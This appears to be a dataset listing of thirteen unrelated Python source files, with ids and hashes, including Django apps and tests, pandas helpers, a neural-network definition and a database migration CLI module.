999,487 | 79cfd875d3bd84e481411276f93393bc70a6be75 | #!C:\Users\Lenovo\Desktop\Online_Angular_8_Batch\My-Neighborhood-master\venv\Scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
999,488 | eb12e8b89799359afa2812019cf7dba8ea343060 | import pandas as pd
import requests
# ______________________________________________________________________________
def update_store_data(df):
'''This function takes the complete_data for stores
changes the date to be datetime
sets indesx to be date
create a month, day of the week, and sales total features
reutrns df'''
# change the date
df.sale_date = pd.to_datetime(df.sale_date)
# set the index
df = df.set_index('sale_date').sort_index()
# create new features
df['month'] = df.index.month
df['day_of_week'] = df.index.day_name()
df['sales_total'] = df.sale_amount * df.item_price
#return the new df
return df
def update_german_energy(df):
'''takes in the german energy data frame
changes date format
sets date as index
renames wind+solar
adds month and year features
replace null values'''
# change date format
df.Date = pd.to_datetime(df.Date)
# set index
df = df.set_index('Date').sort_index()
# add month and yar columns
df['month'] = df.index.month
df['year'] = df.index.year
# replace nulls with 0
df.Wind[np.isnan(df.Wind)] = 0
df.Solar[np.isnan(df.Solar)] = 0
df.Wind_and_Solar[np.isnan(df.Wind_and_Solar)] = 0
# df['month'] = df.index.month
df['year'] = df.index.year
# return df
return df |
999,489 | 50249a02957041431378634eddf4e39fbaa30963 | import pygame
Ga1 = input("Herzlich WIllkommen zum Test der Idioten.[ENTER]")
Ga2 = input("Normalerweise müsste jeder den Test ohne Fehler hinbekommen.[ENTER]")
Ga3 = input("Du musst immer mit nur einem Wort antworten![ENTER]")
Ga4 = input("Bist du Bereit?[ENTER]")
aa1 = input("Fangen wir mit der ersten Frage an.[ENTER]")
print("1. BIst du ein 1% schlau oder 1% dumm?")
print("Hier musst du mit 1% schlau oder 1% dumm antworten")
antwort = input("Eingabe: ")
if antwort =="1% schlau":
print("Die Antwort ist Falsch, weil wenn du 1% schlau bist, bist du du 99% dumm!")
quit()
elif antwort =="1% dumm":
print("Die Antwort ist Richtig, weil wenn man 1% dumm ist, ist man 99%schlau!")
|
999,490 | d1ced553c62414d3729e105890e09a4f48e50450 | /Users/duran/anaconda/lib/python2.7/stat.py |
999,491 | 630c326b10cb10c8e8e275a86e1366db52a89802 | '''
Project Euler #7
Find the 10001st Prime
'''
from primes import prime_list
primes = prime_list(500000)
prime_count = 1
x = 2
while x < 100001:
x += 1
if primes[x]:
prime_count += 1
print x
|
999,492 | e0fdb08fdb996730f5a5de467080ba4dd754e1f0 | #Author :afeng
#Time :2018/5/27 17:11
import requests
url="http://fanyi.baidu.com/basetrans"
data={"query":"你好,世界","from":"zh","to":"en"}
headers={"User-Agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36"}
response=requests.post(url,data=data,headers=headers)
print(response.content.decode()) |
999,493 | 7b130d02867d7d722083faf6d74c792f3f1ebea3 | from django.test import TestCase
from .models import Category, Origin, Location, Product
# Create your tests here.
class TestModels(TestCase):
# Set up non-modified objects used by all test methods
@classmethod
def setUpTestData(cls):
# Set up non-modified objects used by all test methods
Category.objects.create(name='Test Category', friendly_name='Test friendly name')
Origin.objects.create(name='Test Origin', friendly_name='Test Origin friendly name')
Location.objects.create(name='Test Location', friendly_name='Test Location friendly name')
Product.objects.create(description='My product', friendly_name='product', price=100, brand='some')
def test_category_name_label(self):
name = Category.objects.get(pk=1)
field_label = name._meta.get_field('name').verbose_name
self.assertEqual(field_label, 'name')
def test_category_friendly_name_label(self):
name = Category.objects.get(pk=1)
field_label = name._meta.get_field('friendly_name').verbose_name
self.assertEqual(field_label, 'friendly name')
def test_category_name_max_length(self):
name = Category.objects.get(pk=1)
max_length = name._meta.get_field('name').max_length
self.assertEqual(max_length, 254)
def test_category_friendly_name_max_length(self):
friendly_name = Category.objects.get(pk=1)
max_length = friendly_name._meta.get_field('friendly_name').max_length
self.assertEqual(max_length, 254)
def test_category_string_method(self):
item = Category.objects.get(pk=1)
expected_object_name = f'{item.name}'
self.assertEqual(expected_object_name, str(item))
def test_origin_name_label(self):
name = Origin.objects.get(pk=1)
field_label = name._meta.get_field('name').verbose_name
self.assertEqual(field_label, 'name')
def test_origin_friendly_name_label(self):
name = Origin.objects.get(pk=1)
field_label = name._meta.get_field('friendly_name').verbose_name
self.assertEqual(field_label, 'friendly name')
def test_origin_name_max_length(self):
name = Origin.objects.get(pk=1)
max_length = name._meta.get_field('name').max_length
self.assertEqual(max_length, 254)
def test_origin_friendly_name_max_length(self):
friendly_name = Origin.objects.get(pk=1)
max_length = friendly_name._meta.get_field('friendly_name').max_length
self.assertEqual(max_length, 254)
def test_origin_string_method(self):
item = Origin.objects.get(pk=1)
expected_object_name = f'{item.name}'
self.assertEqual(expected_object_name, str(item))
def test_location_name_label(self):
name = Location.objects.get(pk=1)
field_label = name._meta.get_field('name').verbose_name
self.assertEqual(field_label, 'name')
def test_location_friendly_name_label(self):
name = Location.objects.get(pk=1)
field_label = name._meta.get_field('friendly_name').verbose_name
self.assertEqual(field_label, 'friendly name')
def test_location_name_max_length(self):
name = Location.objects.get(pk=1)
max_length = name._meta.get_field('name').max_length
self.assertEqual(max_length, 254)
def test_location_friendly_name_max_length(self):
friendly_name = Location.objects.get(pk=1)
max_length = friendly_name._meta.get_field('friendly_name').max_length
self.assertEqual(max_length, 254)
def test_location_string_method(self):
item = Location.objects.get(pk=1)
expected_object_name = f'{item.name}'
self.assertEqual(expected_object_name, str(item))
def test_product_price_is_not_string(self):
price = Product.objects.get(pk=1)
self.assertNotIsInstance(price.price, str)
def test_product_string_method(self):
item = Product.objects.get(pk=1)
expected_object_name = f'{item.friendly_name}'
self.assertEqual(expected_object_name, str(item))
def test_product_friendly_name_max_length(self):
friendly_name = Product.objects.get(pk=1)
max_length = friendly_name._meta.get_field('friendly_name').max_length
self.assertEqual(max_length, 254)
|
999,494 | 209759dfd3117cd9ac134de4a900cae1c97c102a | #!/usr/bin/env python3
import pathlib
import os
rootpath = pathlib.Path(__file__).parents[1]
libpath = os.path.join(rootpath,"src","game","lib","res")
playerpath = os.path.join(libpath,"player")
buttonspath = os.path.join(libpath,"buttons")
enemypath = os.path.join(libpath,"enemy")
print(libpath)
print(playerpath)
print(buttonspath)
print(enemypath)
|
999,495 | 70162cde07bf1724fde2baf5a0a4af73d2b18170 | config = {
'GOALIE_PARAMS': (57, 5, 9),
'OFFENSE_PARAMS': (61, -2, -2),
'PIXELS_PER_CM': 12.598,
'ROI': [[200, 80], [1004, 95], [990, 662], [199, 646]],
'BALL_THRESH': ((7, 0, 0), (61, 167, 255)),
'ROBOT_THRESH': ((150, 74, 37), (198, 255, 207)),
'HUMAN_THRESH': ((104, 175, 0), (128, 255, 255))
} |
999,496 | 9ccc2e90150a91651eda378384eb9a322b569a1d | from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'users'
# Import the signals declared in signals.py (this is just Django a Django convention intended to avoid side effects)
def ready(self):
import users.signals
|
999,497 | 89da6b9be72cbbad275e83a9558c22d983b7748c | #!/usr/bin/python3
from __future__ import print_function
from main import run
from layers import *
network = compose(
conv2D(3, 128, 3),
relu(),
max_pool_2d(2),
conv2D(128, 128, 3),
relu(),
max_pool_2d(2),
conv2D(128, 128, 3),
relu(),
max_pool_2d(2),
flatten(),
xaffine(512, 512),
bnorm(512, 0.1),
relu(),
xaffine(512, 512),
bnorm(512, 0.1),
relu(),
xaffine(512, 10),
relu(),
softmax()
)
run(network, "mark2b")
|
999,498 | 58a330d87393999fdaad6db40cd973e8a79caed6 | from setuptools import setup
import shutil
with open('usefulholidays/requirements.txt') as f:
required = f.read().splitlines()
setup(install_requires = required,
name='usefulholidays',
version='0.4',
description='The disrupting package to check the school calendar :) ',
url='https://github.com/WRPLA/usefulholidays',
author='brios',
license='T4T-Rios',
packages=['usefulholidays'],
package_data={'usefulholidays': ['*.db']},
zip_safe=False)
|
999,499 | 9f1bf4202b4f9f23530cd0d4686e484058c6c33b | # Copyright 2015 Oliver Cope
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import re
import warnings
from tabulate import tabulate
from yoyo import read_migrations, default_migration_table, ancestors, descendants
from yoyo.scripts.main import InvalidArgument, get_backend
from yoyo import utils
def install_argparsers(global_parser, subparsers):
migration_parser = argparse.ArgumentParser(add_help=False)
migration_parser.add_argument(
"sources", nargs="*", help="Source directory of migration scripts"
)
migration_parser.add_argument(
"-l",
"--limit",
default=None,
help="Limit apply, rollback or reapply to N migrations."
)
migration_parser.add_argument(
"-d",
"--database",
default=None,
help="Database, eg 'sqlite:///path/to/sqlite.db' "
"or 'postgresql://user@host/db'",
)
migration_parser.add_argument(
"-m",
"--match",
help="Select migrations matching PATTERN (regular expression)",
metavar="PATTERN",
)
migration_parser.add_argument(
"-a",
"--all",
dest="all",
action="store_true",
help="Select all migrations, regardless of whether "
"they have been previously applied",
)
migration_parser.add_argument(
"-f",
"--force",
dest="force",
action="store_true",
help="Force apply/rollback of steps even if " "previous steps have failed",
)
migration_parser.add_argument(
"-p",
"--prompt-password",
dest="prompt_password",
action="store_true",
help="Prompt for the database password",
)
migration_parser.add_argument(
"--migration-table",
dest="migration_table",
action="store",
default=default_migration_table,
help="Name of table to use for storing " "migration metadata",
)
migration_parser.add_argument(
"-r",
"--revision",
help="Apply/rollback migration with id " "REVISION",
metavar="REVISION",
)
parser_apply = subparsers.add_parser(
"apply", help="Apply migrations", parents=[global_parser, migration_parser]
)
parser_apply.set_defaults(func=apply, command_name="apply")
parser_apply = subparsers.add_parser(
"showmigrations", help="Show migrations", parents=[global_parser, migration_parser]
)
parser_apply.set_defaults(func=show_migrations, command_name="showmigrations")
parser_rollback = subparsers.add_parser(
"rollback",
parents=[global_parser, migration_parser],
help="Rollback migrations",
)
parser_rollback.set_defaults(func=rollback, command_name="rollback")
parser_reapply = subparsers.add_parser(
"reapply", parents=[global_parser, migration_parser], help="Reapply migrations"
)
parser_reapply.set_defaults(func=reapply, command_name="reapply")
parser_mark = subparsers.add_parser(
"mark",
parents=[global_parser, migration_parser],
help="Mark migrations as applied, without running them",
)
parser_mark.set_defaults(func=mark, command_name="mark")
parser_unmark = subparsers.add_parser(
"unmark",
parents=[global_parser, migration_parser],
help="Unmark applied migrations, without rolling them back",
)
parser_unmark.set_defaults(func=unmark, command_name="unmark")
parser_break_lock = subparsers.add_parser(
"break-lock", parents=[global_parser], help="Break migration locks"
)
parser_break_lock.set_defaults(func=break_lock, command_name="break-lock")
parser_break_lock.add_argument(
"-d",
"--database",
default=None,
help="Database, eg 'sqlite:///path/to/sqlite.db' "
"or 'postgresql://user@host/db'",
)
def get_migrations(args, backend):
sources = args.sources
dburi = args.database
if not sources:
raise InvalidArgument("Please specify the migration source directory")
migrations = read_migrations(*sources)
if args.match:
migrations = migrations.filter(
lambda m: re.search(args.match, m.id) is not None
)
if not args.all:
if args.func in {apply, mark}:
migrations = backend.to_apply(migrations)
elif args.func in {rollback, reapply, unmark}:
migrations = backend.to_rollback(migrations)
elif args.func == show_migrations:
return backend.get_migrations_with_applied_status(migrations)
if args.revision:
targets = [m for m in migrations if args.revision in m.id]
if len(targets) == 0:
raise InvalidArgument(
"'{}' doesn't match any revisions.".format(args.revision)
)
if len(targets) > 1:
raise InvalidArgument(
"'{}' matches multiple revisions. "
"Please specify one of {}.".format(
args.revision, ", ".join(m.id for m in targets)
)
)
target = targets[0]
# apply: apply target an all its dependencies
if args.func in {mark, apply}:
deps = ancestors(target, migrations)
target_plus_deps = deps | {target}
migrations = migrations.filter(lambda m: m in target_plus_deps)
# rollback/reapply: rollback target and everything that depends on it
else:
deps = descendants(target, migrations)
target_plus_deps = deps | {target}
migrations = migrations.filter(lambda m: m in target_plus_deps)
if not args.batch_mode and not args.revision:
migrations = prompt_migrations(backend, migrations, args.command_name)
if args.batch_mode and not args.revision and not args.all and args.func is rollback:
if len(migrations) > 1:
warnings.warn(
"Only rolling back a single migration."
"To roll back multiple migrations, "
"either use interactive mode or use "
"--revision or --all"
)
migrations = migrations[:1]
if not args.batch_mode and migrations:
print("")
print(
"Selected", utils.plural(len(migrations), "%d migration:", "%d migrations:")
)
for m in migrations:
print(" [{m.id}]".format(m=m))
prompt = "{} {} to {}".format(
args.command_name.title(),
utils.plural(len(migrations), "this migration", "these %d migrations"),
dburi,
)
if not utils.confirm(prompt, default="y"):
return migrations.replace([])
return migrations
def apply(args, config):
backend = get_backend(args, config)
with backend.lock():
migrations = get_migrations(args, backend)
backend.apply_migrations(migrations, args.force, limit=args.limit)
def show_migrations(args, config):
backend = get_backend(args, config)
with backend.lock():
migrations = get_migrations(args, backend)
print(tabulate(
[(m.id, '\033[92m Yes \033[0m' if m.applied else '\033[91m No \033[0m') for m in migrations],
headers=['Migration', 'Applied'])
)
def reapply(args, config):
backend = get_backend(args, config)
with backend.lock():
migrations = get_migrations(args, backend)
backend.rollback_migrations(migrations, args.force, limit=args.limit)
migrations = backend.to_apply(migrations)
backend.apply_migrations(migrations, args.force, limit=args.limit)
def rollback(args, config):
backend = get_backend(args, config)
with backend.lock():
migrations = get_migrations(args, backend)
backend.rollback_migrations(migrations, args.force, limit=args.limit)
def mark(args, config):
backend = get_backend(args, config)
with backend.lock():
migrations = get_migrations(args, backend)
backend.mark_migrations(migrations)
def unmark(args, config):
backend = get_backend(args, config)
with backend.lock():
migrations = get_migrations(args, backend)
backend.unmark_migrations(migrations)
def break_lock(args, config):
backend = get_backend(args, config)
backend.break_lock()
def prompt_migrations(backend, migrations, direction):
"""
Iterate through the list of migrations and prompt the user to
apply/rollback each. Return a list of user selected migrations.
direction
one of 'apply' or 'rollback'
"""
class prompted_migration(object):
def __init__(self, migration, default=None):
super(prompted_migration, self).__init__()
self.migration = migration
self.choice = default
to_prompt = [prompted_migration(m) for m in migrations]
position = 0
while position < len(to_prompt):
mig = to_prompt[position]
choice = mig.choice
if choice is None:
is_applied = backend.is_applied(mig.migration)
if direction == "apply":
choice = "n" if is_applied else "y"
else:
choice = "y" if is_applied else "n"
options = "".join(o.upper() if o == choice else o.lower() for o in "ynvdaqjk?")
print("")
print("[%s]" % (mig.migration.id,))
response = utils.prompt("Shall I %s this migration?" % (direction,), options)
if response == "?":
print("")
print("y: %s this migration" % (direction,))
print("n: don't %s it" % (direction,))
print("")
print("v: view this migration in full")
print("")
print(
"d: %s the selected migrations, skipping any remaining" % (direction,)
)
print("a: %s all the remaining migrations" % (direction,))
print("q: cancel without making any changes")
print("")
print("j: skip to next migration")
print("k: back up to previous migration")
print("")
print("?: show this help")
continue
if response in "yn":
mig.choice = response
position += 1
continue
if response == "v":
print(mig.migration.source)
continue
if response == "j":
position = min(len(to_prompt), position + 1)
continue
if response == "k":
position = max(0, position - 1)
if response == "d":
break
if response == "a":
for mig in to_prompt[position:]:
mig.choice = "y"
break
if response == "q":
for mig in to_prompt:
mig.choice = "n"
break
return migrations.replace(m.migration for m in to_prompt if m.choice == "y")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.